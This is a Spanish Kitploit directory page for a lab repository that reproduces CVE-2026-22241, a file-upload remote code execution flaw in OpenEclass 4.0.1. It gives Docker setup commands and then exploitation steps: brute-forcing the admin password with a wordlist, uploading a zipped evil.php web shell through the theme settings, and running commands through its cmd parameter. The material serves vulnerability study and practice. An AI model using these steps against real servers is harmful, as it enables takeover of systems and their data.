Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22241 — Entorno de laboratorio para CVE-2026-22241 | Kitploit
Herramientas/GitHubGitHub/cves-labs/cve-2026-22241
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Entorno de laboratorio para CVE-2026-22241

Ver Repositorio
52hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22241

Entorno de laboratorio para CVE-2026-22241

Descripción de la vulnerabilidad:

  • Vulnerabilidad: Carga sin restricciones de archivos con tipo peligroso.
  • Impacto: Ejecución remota de código (RCE).
  • Descripción: Esta falla permite a un atacante con privilegios administrativos cargar un archivo PHP malicioso (Web Shell), lo que lleva al compromiso total de la integridad y seguridad del servidor web.
  • Sistema objetivo: Infraestructura educativa OpenClass.

1. Construir el entorno

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

abre https://www.openeclass.org/en/previous-versions/ y descarga openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

imagen

2. Explotar la vulnerabilidad:

para la lista de claves en ZAP (Fuerza Bruta): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

en la página de eclass: ve a herramienta de administración -> ajustes de tema -> luego sube poc.zip

en la nueva página:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id

Descargar herramienta